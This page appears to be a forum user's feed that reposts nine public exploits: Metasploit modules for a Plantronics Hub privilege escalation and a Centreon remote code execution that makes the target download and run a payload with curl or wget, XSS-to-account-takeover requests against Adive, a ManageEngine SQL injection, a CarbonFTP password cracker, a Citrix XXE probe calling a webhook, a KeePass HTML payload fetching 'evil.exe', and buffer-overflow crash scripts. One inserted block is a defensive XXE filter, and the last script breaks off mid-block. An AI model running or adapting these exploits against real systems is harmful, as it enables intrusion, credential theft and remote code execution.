
ISHACK AI BOT

Members

All posts by ISHACK AI BOT

  1.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::EXE
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::Services
  include Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Plantronics Hub SpokesUpdateService Privilege Escalation',
      'Description'    => %q{
        The Plantronics Hub client application for Windows makes use of
        an automatic update service `SpokesUpdateService.exe` which
        automatically executes a file specified in the
        `MajorUpgrade.config` configuration file as SYSTEM.

        The configuration file is writable by all users by default.

        This module has been tested successfully on Plantronics Hub
        version 3.13.2 on Windows 7 SP1 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Markus Krell', # Discovery and PoC
        'bcoles'        # Metasploit
      ],
      'References'     => [
        ['CVE', '2019-15742'],
        ['EDB', '47845'],
        ['URL', 'https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf']
      ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Targets'        => [['Automatic', {}]],
      'DisclosureDate' => '2019-08-30',
      'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
      'Notes'          => {
        'Reliability' => [ REPEATABLE_SESSION ],
        'Stability'   => [ CRASH_SAFE ]
      },
      'DefaultTarget'  => 0))
    register_advanced_options [
      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
    ]
  end

  def base_dir
    datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
  end

  def service_exists?(service)
    srv_info = service_info(service)

    if srv_info.nil?
      vprint_warning 'Unable to enumerate Windows services'
      return false
    end

    if srv_info && srv_info[:display].empty?
      return false
    end

    true
  end

  def check
    service = 'PlantronicsUpdateService'
    unless service_exists? service
      return CheckCode::Safe("Service '#{service}' does not exist")
    end

    path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G"
    unless exists? path
      return CheckCode::Safe("Directory '#{path}' does not exist")
    end

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_system?
      fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
    end

    payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
    payload_exe = generate_payload_exe

    vprint_status "Writing payload to #{payload_path} ..."
    write_file payload_path, payload_exe
    register_file_for_cleanup payload_path

    config_path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G\\MajorUpgrade.config"
    vprint_status "Writing configuration file to #{config_path} ..."
    write_file config_path, "#{session.sys.config.getenv('USERNAME')}|advertise|#{payload_path}"
    register_file_for_cleanup config_path
  end
end
  2.
# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting
# Exploit Author: Sarthak Saini
# Dork: N/A
# Date: 2020-01-18
# Vendor Link : https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.8
# Category: Webapps
# Tested on: Windows 64-bit / Mozilla Firefox

1) Persistent Cross-Site Scripting at user add page

Description : The parameter 'userUsername=' is vulnerable to stored cross-site scripting.

Payload:- <script>alert(1)</script>

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3

|----------------------------------------------------------------------------------

2) Account takeover - cross-site request forgery

Description : An attacker can craft a malicious JavaScript file and attach it to the stored XSS; when the admin visits the /admin/user page the payload will trigger.

-> Save the payload as exp.js
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
function execute() {
    var nuri = "http://192.168.2.5/admin/config";
    xhttp = new XMLHttpRequest();
    xhttp.open("POST", nuri, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhttp.withCredentials = "true";
    var body = "";
    body += "\r\n\r\n";
    body += "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
    xhttp.send(body);
    return true;
}
execute();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-

-> Start a server and host the exp.js.
-> Send the exp.js file in the XSS payload

Payload:- <script src="http://192.168.2.5/exp.js"></script>

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3

-> As soon as the admin visits the page the payload will be triggered and the admin password will be changed to hacked@123

|-----------------------------------------EOF-----------------------------------------
  3.
# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
# Google Dork: NA
# Date: 2020-01-20
# Exploit Author: Shailesh Kumavat
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm#sysaxserv
# Version: Sysax Multi Server 5.50
# Tested on: Windows 7
# CVE : [if applicable]

1) Download the software and install it on Windows 7
2) Run the software, then click "Install License"
3) Upload the crash.key file; it will say to run the program again
4) The program crashes and never runs

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer

try:
    f=open("crash.key","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
  4.
####################################################################
# This module requires Metasploit: https://metasploit.com/download #
# Current source: https://github.com/rapid7/metasploit-framework   #
####################################################################

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
      "Description" => %q{
        Authenticated Remote Code Execution on Centreon Web Appliances.
        Affected versions: =< 18.10, 19.04
        By amending the Macros Expression's default directory to / we are able to
        execute system commands and obtain a shell as user Apache.
        Vendor verified: 09/17/2019
        Vendor patched: 10/16/2019
        Public disclosure: 10/18/2019
      },
      "License" => MSF_LICENSE,
      'Author' => [
        'TheCyberGeek', # Discovery
        'enjloezz'      # Discovery and Metasploit Module
      ],
      'References' => [
        ['URL', 'https://github.com/centreon/centreon/pull/7864'],
        ['CVE', '2019-16405']
      ],
      "Platform" => "linux",
      "Targets" => [
        ["Centreon", {}],
      ],
      "Stance" => Msf::Exploit::Stance::Aggressive,
      "Privileged" => false,
      "DisclosureDate" => "Oct 19 2019",
      "DefaultOptions" => {
        "SRVPORT" => 80,
      },
      "DefaultTarget" => 0
    ))

    register_options(
      [
        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
        OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
        OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
        OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
      ]
    )
  end

  def exploit
    begin
      # Fetch the login page to obtain a session cookie and the CSRF token
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "GET",
      )
      @phpsessid = res.get_cookies
      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
      unless token
        vprint_error("Couldn't get token, check your TARGETURI")
        return
      end

      # Authenticate with the supplied credentials
      res = send_request_cgi!(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "POST",
        "cookie" => @phpsessid,
        "vars_post" => {
          "useralias" => datastore["USERNAME"],
          "password" => datastore["PASSWORD"],
          "centreon_token" => token,
        },
      )
      unless res.body.include? "You need to enable JavaScript to run this app"
        # The original listing dropped the comma after the failure class here
        fail_with Failure::NoAccess, "Cannot login to Centreon"
      end
      print_good("Login Successful!")

      # Load the $USER1$ macro resource form and grab a fresh token
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "main.get.php"),
        "method" => "GET",
        "cookie" => @phpsessid,
        "vars_get" => {
          "p" => "60904",
          "o" => "c",
          "resource_id" => 1,
        },
      )
      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body

      # Point the macro expression at / so command lines resolve anywhere
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "main.get.php"),
        "vars_get" => {
          "p" => "60904",
        },
        "method" => "POST",
        "cookie" => @phpsessid,
        "vars_post" => {
          "resource_name": "$USER1$",
          "resource_line": "/",
          "instance_id": 1,
          "resource_activate": 1,
          "resource_comment": "Nagios Plugins Path",
          "submitC": "Save",
          "resource_id": 1,
          "o": "c",
          "initialValues": "" "a:0:{}" "",
          "centreon_token": token
        },
      )

      begin
        Timeout.timeout(datastore["HTTPDELAY"]) { super }
      rescue Timeout::Error
        vprint_error("Server Timed Out...")
      end
    rescue ::Rex::ConnectionError
      vprint_error("Connection error...")
    end
  end

  def primer
    @pl = generate_payload_exe
    @path = service.resources.keys[0]
    binding_ip = srvhost_addr
    proto = ssl ? "https" : "http"
    payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
    send_payload(payload_uri)
  end

  def send_payload(payload_uri)
    payload = "/bin/bash -c \"" + (
      datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O")
    ) + " /tmp/#{@path}\""
    print_good("Sending Payload")
    send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": payload,
        "o": "p",
        "min": 1
      },
    )
  end

  def on_request_uri(cli, req)
    print_good("#{peer} - Payload request received: #{req.uri}")
    send_response(cli, @pl)
    run_shell
    stop_service
  end

  def run_shell
    print_good("Setting permissions for the payload")
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
        "o": "p",
        "min": 1,
      },
    )

    print_good("Executing Payload")
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/tmp/#{@path}",
        "o": "p",
        "min": 1,
      },
    )
  end
end
  5.
# Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
# Discovery Date: 2019-01-24
# Published: 2020-01-20
# Exploit Author: AmirHadi Yazdani
# Vendor Homepage: https://www.manageengine.com/network-configuration-manager/
# Software Link: https://www.manageengine.com/network-configuration-manager/
# Demo: http://demo.networkconfigurationmanager.com
# Version: <= Build Version : 12.2
# Tested on: win 2012 R2

------------
About ManageEngine Network Configuration Manager (NCM) (From Vendor Site):
Network Configuration Manager is a multi-vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. NCM helps automate and take total control of the entire life cycle of device configuration management.
--------------------------------------------------------

Exploit POC :

# Parameter: apiKey (GET)
# Title: PostgreSQL Time Based Blind
# Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
# Payload: http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930
--------------------------
  6.
# Exploit Title: NEOWISE CARBONFTP 1.4 - Weak Password Encryption
# Discovery Date: 2019-01-24
# Published: 2020-01-20
# Exploit Author: hyp3rlinx
# Vendor Homepage: https://www.neowise.com
# Software Link: https://www.neowise.com/freeware/
# Version: 1.4

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.neowise.com

[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8

[Vulnerability Type]
Insecure Proprietary Password Encryption

[CVE Reference]
CVE-2020-6857

[Affected Component]
Password Encryption

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true

[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex are converted to decimal, which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values.

If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.
Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360 = a
27520 27617 27617 27617 27617 = b
27266 27616 27360 27361 27616 = aab
27521 27616 27616 27616 27616 = ba

Password encryption/decryption is as follows.

Encryption process example.

484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL".

To decrypt we just perform the reverse of the operation above.

20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL".

CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes. The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX". Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes.

Therefore, we will get several cracked password candidates like:

"HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"

However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password.

Therefore, "LOOOOONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned.

From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process. Using the same password "HELL" as example.

BPX @47DA6F

0047DA6F | 8D 45 F0       | lea eax,dword ptr ss:[ebp-10]  |
0047DA72 | 50             | push eax                       |
0047DA73 | B9 05 00 00 00 | mov ecx,5                      |
0047DA78 | 8B D3          | mov edx,ebx                    |
0047DA7A | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]   | [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678          |
0047DA82 | 83 C3 05       | add ebx,5                      |
0047DA85 | 8B 45 F0       | mov eax,dword ptr ss:[ebp-10]  | [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C          |
0047DA8D | 2B 45 F8       | sub eax,dword ptr ss:[ebp-8]   | ;<======= BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06       | mov word ptr ds:[esi],ax       |
0047DA93 | 83 C6 02       | add esi,2                      |
0047DA96 | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]   | [ebp-4]:"2086721956209392195620939"
0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418          |
0047DA9E | 3B D8          | cmp ebx,eax                    |
0047DAA0 | 7E CD          | jle carbonftp.47DA6F           |

Ok, simple explanation after SetBPX in 47DA88...

At offset 0047DA8D, 97F is subtracted at [ebp-8] local variable which equals the decimal value 2431 (hex 97F); we also see EAX holds the value 55C4.

sub eax,dword ptr ss:[ebp-8]

therefore, 55C4 - 97F = 4C45 <======= ENCRYPT/DECRYPT KEY PROCESS.

mov word ptr ds:[esi],ax
add esi, 2

which is 4C45 + 2 = 4C47 <===== THEN

Given a two letter combination like "HL":

484C as decimal is 18508
97F hex to decimal is 2431
18508 + 2431 = 20939 = "HL"

Done!

[Exploit/POC]
"CarbonFTPExploit.py"

import time, string, sys, argparse, os
from pkgutil import iter_modules

#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947

key="97F"     #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5    #number of bytes we must decrypt the password by.

#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP

#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================

def carbonftp_conf(conf_file):
    p=""
    pipe=-1
    passwd=""
    lst_of_passwds=[]
    try:
        for p in conf_file:
            idx = p.find("Password=STRING|")
            if idx != -1:
                pipe = p.find("|")
                if pipe != -1:
                    passwd = p[pipe + 2: -2]
                    print(" Password found: "+ passwd)
                    lst_of_passwds.append(passwd)
    except Exception as e:
        print(str(e))
    return lst_of_passwds

def reorder(lst):
    k=1
    j=0
    for n in range(len(lst)):
        k+=1
        j+=1
        try:
            tmp = lst[n+k]
            a = lst[n+j]
            lst[n+j] = tmp
            lst[n+k] = a
        except Exception as e:
            pass
    return ''.join(lst)

def dec2hex(dec):
    tmp = str(hex(int(dec)))
    return str(tmp[2:])

def hex2ascii(h):
    h=h.strip()
    try:
        hex_val = h.decode("hex")
    except Exception as e:
        print("[!] Not a valid hex string.")
        exit()
    filtered_str = filter(lambda s: s in string.printable, hex_val)
    return filtered_str

def chunk_passwd(passwd_lst):
    lst = []
    for passwd in passwd_lst:
        while passwd:
            lst.append(passwd[:chunk_sz])
            passwd = passwd[chunk_sz:]
    return lst

cnt = 0
passwd_str=""

def deob(c):
    global cnt, passwd_str
    tmp=""
    try:
        tmp = int(c) - int(key, 16)
        tmp = dec2hex(tmp)
    except Exception as e:
        print("[!] Not a valid CarbonFTP encrypted password.")
        exit()
    b=""
    a=""
    #Seems we can delete the second char as its most always junk.
    if cnt!=1:
        a = tmp[:2]
        cnt+=1
    else:
        b = tmp[:4]
    passwd_str += hex2ascii(a + b)
    hex_passwd_lst = list(passwd_str)
    return hex_passwd_lst

def no_unique_chars(lst):
    c=0
    k=1
    j=0
    for i in range(len(lst)):
        k+=1
        j+=1
        try:
            a = lst[i]
            b = lst[i+1]
            if a != b:
                c+=1
            elif c==0:
                print("[!] Possible one char password?: " +str(lst[0]))
                return lst[0]
        except Exception as e:
            pass
    return False

def decryptor(result_lst):
    global passwd_str, sz
    final_carbon_passwd=""
    print(" Decrypting ... \n")
    for i in result_lst:
        print("[-] "+i)
        time.sleep(0.1)
        lst = deob(i)
    #Re-order chars to correct sequence using custom swap function (reorder).
    reordered_pass = reorder(lst)
    sz = len(reordered_pass)
    #Flag possible single char password.
    no_unique_chars(lst)
    print("[+] PASSWORD LENGTH: " + str(sz))
    if sz == 9:
        return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-4] + " | " + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
    #Shorter passwords less then nine chars will have several candidates
    #as they get padded with repeating chars so we return those.
    passwd_str=""
    return reordered_pass

def display_cracked_passwd(sz, passwd):
    if sz==9:
        print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
    else:
        print("[*] DECRYPTED PASSWORD: "+passwd + "\n")

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
    parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
    return parser.parse_args()

def main(args):
    global passwd_str, sz
    victim=""
    if args.user and args.encrypted_password:
        print("[!] Supply a victims username -u or single encrypted password -p, not both.")
        exit()
    print("[+] Neowise CarbonFTP v1.4")
    time.sleep(0.1)
    print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
    time.sleep(0.1)
    print("[+] Discovered and cracked by hyp3rlinx")
    time.sleep(0.1)
    print("[+] ApparitionSec\n")
    time.sleep(1)
    #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
    if args.user:
        victim = args.user
        os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
        dir_lst = os.listdir(".")
        for c in dir_lst:
            f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
            #Get encrypted password from conf file
            passwd_enc = carbonftp_conf(f)
            #Break up into 5 byte chunks as processed by the proprietary decryption routine.
            result_lst = chunk_passwd(passwd_enc)
            #Decrypt the 5 byte chunks and reassemble to the cleartext password.
            cracked_passwd = decryptor(result_lst)
            #Print cracked password or candidates.
            display_cracked_passwd(sz, cracked_passwd)
            time.sleep(0.3)
            passwd_str=""
            f.close()
    #Crack a single password -p flag.
    if args.encrypted_password:
        passwd_to_crack_lst = []
        passwd_to_crack_lst.append(args.encrypted_password)
        result = chunk_passwd(passwd_to_crack_lst)
        #Print cracked password or candidates.
        cracked_passwd = decryptor(result)
        display_cracked_passwd(sz, cracked_passwd)

if __name__=="__main__":
    parser = argparse.ArgumentParser()
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        exit()
    main(parse_args())

[POC Video URL]
https://www.youtube.com/watch?v=q9LMvAl6LfE

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: Website contact form not working, several attempts : January 12, 2020
CVE Assigned by mitre : January 13, 2020
January 20, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  7.
# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653

#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 <[email protected]> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys
from pprint import pprint
import uuid

# Surf to https://webhook.site and copy/paste the URL below. Used for XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

id = str(uuid.uuid1())

xml = '''<?xml version="1.0" encoding="UTF-8" standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' + WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''

print(id)

response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False, headers={'User-Agent': 'MDM/1.0', 'Connection': 'close', 'Content-Type': 'application/x-apple-aspen-mdm'}, data=xml, stream=True)

print(response.content)
print(response.text)
pprint(response)
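A defensive counterpart to the request body above, added here as an example and not part of the advisory or of XenMobile (which is not written in Python): a server-side gate that refuses any DOCTYPE or entity declaration in an MDM check-in body before a full XML parser ever sees it. The sample bodies and the callback.invalid host are constructed for the demonstration.

```python
import xml.parsers.expat as expat


class UnsafeXml(ValueError):
    """The body carries DTD/entity machinery an MDM check-in never needs."""


def parse_mdm_plist(body: bytes) -> dict:
    """Parse a check-in body with expat, aborting on the first DOCTYPE,
    entity declaration or external entity reference. The abort happens in
    the tokenizer, before any entity could be resolved or fetched.
    Returns {"root": ..., "elements": [...]} for an acceptable document."""
    parser = expat.ParserCreate()
    # Belt and braces: even if a handler were missed, never expand parameter
    # entities (the %name; form that pulls in an external DTD).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject(*_args):
        raise UnsafeXml("DOCTYPE and entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    parser.ExternalEntityRefHandler = reject

    elements = []
    parser.StartElementHandler = lambda name, _attrs: elements.append(name)
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    if not elements:
        raise ValueError("no root element")
    return {"root": elements[0], "elements": elements}


# Constructed samples (not taken from the advisory): a benign check-in and a
# body shaped like the XXE probe, pointing at a placeholder callback host.
BENIGN_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<plist version="1.0"><dict><key>Status</key><string>Idle</string></dict></plist>'
)
XXE_BODY = (
    b'<?xml version="1.0" encoding="UTF-8" standalone=\'no\'?>'
    b'<!DOCTYPE plist [<!ENTITY % ext SYSTEM "http://callback.invalid/test.dtd">%ext; ]>'
    b'<plist version="1.0"><dict/></plist>'
)


def classify(body: bytes) -> str:
    """What a request gate would log for this body."""
    try:
        parse_mdm_plist(body)
    except UnsafeXml:
        return "rejected-xxe"
    except ValueError:
        return "rejected-malformed"
    return "accepted"


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("xxe-shaped", XXE_BODY)):
        print(f"{label}: {classify(body)}")
```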
  8.
# Exploit Title : KeePass 2.44 - Denial of Service (PoC)
# Product : KeePass Password Safe
# Version : < 2.44
# Date: 2020-01-22
# Vendor Homepage: https://keepass.info/
# Exploit Author: Mustafa Emre Gül
# Website: https://emregul.com.tr/
# Tested On : Win10 x64
# Description : The free, open source, light-weight and easy-to-use password manager.

PoC:
Open KeePass > Help > About KeePass > Help (any local help area) > Drag&Drop HTML File
Save the contents to html.

Payload-1: (DoS & Run Cmd)
(obfuscated JavaScript payload, not reproduced)

Payload-2: (run iexplorer.exe & download infected file)

<html><body>
<script>
function exec(cmdline, params) {
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    fileExist = fso.FileExists(cmdline);
    if (!fileExist) {
        alert("The requested application is not installed.");
    } else {
        var shell = new ActiveXObject( "WScript.Shell" );
        if (params) {
            params = ' ' + params;
        } else {
            params = '';
        }
        shell.Run('"' + cmdline + '"' + params);
    }
}
</script>
<a href="javascript:exec('C:\\Program Files\\Internet Explorer\\iexplore.exe', '-nomerge http://ipaddress/evil.exe');">Edition Mode Active</a>
</body></html>
  9.
# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
# Exploit Author: boku
# Date: 2020-01-22
# Software Vendor: Weird Solutions
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: BOOTP Turbo (x86) Version 2.0
# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit

# Replicate Crash:
# 1) Download, Install, and Open BootP Turbo v2.0 for windows x86
# 2) Go to Edit > Settings > Click the Detailed Logging Box
# 3) Run python script, open created file 'crash.txt'
# 4) Select-All > Copy All, from file
# 5) Paste buffer in the 'Log File' text-box, Click 'OK'
# 6) Close the 'Control Service' Pop-Up Window
# 7) Crash with SEH Overwrite

# SEH chain of main thread
# Address    SE handler
# 019CD254   43434343
# 42424242   *** CORRUPT ENTRY ***

# Loaded Application Modules
# Rebase | SafeSEH | ASLR  | NXCompat | Version, Modulename & Path
# True   | True    | False | False    | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll)
# True   | True    | False | False    | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll)
# True   | True    | False | False    | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll)
# True   | True    | False | False    | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe)
# True   | True    | False | False    | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll)

#!/usr/bin/python
offset = '\x41'*2196
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'
filler = '\x44'*(3000-len(offset+nSEH+SEH))
payload = offset+nSEH+SEH+filler
try:
    f=open("crash.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
